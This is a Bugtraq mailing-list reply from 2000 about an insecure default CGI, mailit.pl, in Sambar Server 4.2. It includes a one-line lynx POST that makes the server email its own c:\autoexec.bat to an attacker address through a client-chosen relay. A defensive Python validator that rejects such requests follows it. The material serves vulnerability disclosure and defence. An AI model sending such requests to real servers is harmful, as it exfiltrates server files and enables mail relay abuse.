[14023] in bugtraq
Re: Sambar Server alert! (2)
daemon@ATHENA.MIT.EDU (J.A. Gutierrez)
Fri Feb 25 17:58:21 2000
Message-Id: <200002251411.PAA05836@gtc1.cps.unizar.es>
Date: Fri, 25 Feb 2000 15:11:43 +0100
Reply-To: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <38B50F5C.F2ED0878@cybcom.net> from "Georgi Chorbadzhiyski" at Feb 24, 0 01:00:44 pm
This is not the only problem with the default CGIs included with
Sambar 4.2.
Have you tried
echo 'server=smtp.example.com&from=root@example.com&recipient=evil@evil.org&subject=Hi&body=Hello+World%0A&attach=c:\autoexec.bat' | lynx -post_data http://sambar.example.com/cgi-bin/mailit.pl
?
--
finger spd@gtc1.cps.unizar.es for PGP / So be easy and free
.mailcap tip of the day: / when you're drinking with me
application/ms-tnef; cat '%s' > /dev/null / I'm a man you don't meet every day
text/x-vcard; cat '%s' > /dev/null / (the pogues)
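
Added example, not part of the original message and not Sambar's code: a server-side check that would reject the request quoted above, assuming (as the message implies) that mailit.pl treats `attach` as a path on the server and relays through the client-supplied `server`. `ALLOWED_DIR`, `FIXED_RELAY` and the function names are hypothetical, and the CR/LF header check goes slightly beyond what the message shows.

```python
import ntpath
from urllib.parse import parse_qs

# Assumed policy values (hypothetical, not from Sambar): attachments may only
# come from this directory, and mail always goes through one fixed relay.
ALLOWED_DIR = r"c:\sambar\mailit\outbox"
FIXED_RELAY = "smtp.example.com"

def _norm(path):
    # normpath collapses ".." and mixed separators; normcase lowercases and
    # converts "/" to "\" so comparisons follow Windows semantics.
    return ntpath.normcase(ntpath.normpath(path))

def attach_allowed(path, base=ALLOWED_DIR):
    """True only if path resolves to a file strictly inside base."""
    if not path or "\x00" in path:
        return False
    if not ntpath.isabs(path):
        path = ntpath.join(base, path)
    full, root = _norm(path), _norm(base)
    return full.startswith(root + "\\")

def check_mailit_request(body):
    """Return a list of policy violations for a urlencoded POST body."""
    form = parse_qs(body, keep_blank_values=True)
    problems = []
    for value in form.get("attach", []):
        if not attach_allowed(value):
            problems.append("attach outside allowed directory: " + value)
    for value in form.get("server", []):
        if value.lower() != FIXED_RELAY:
            problems.append("client-chosen SMTP server: " + value)
    for field in ("from", "recipient", "subject"):
        for value in form.get(field, []):
            if "\r" in value or "\n" in value:
                problems.append("CR/LF in header field: " + field)
    return problems

# Form body quoted in the message above.
POSTED = ("server=smtp.example.com&from=root@example.com"
          "&recipient=evil@evil.org&subject=Hi&body=Hello+World%0A"
          r"&attach=c:\autoexec.bat")

if __name__ == "__main__":
    for p in check_mailit_request(POSTED):
        print(p)
```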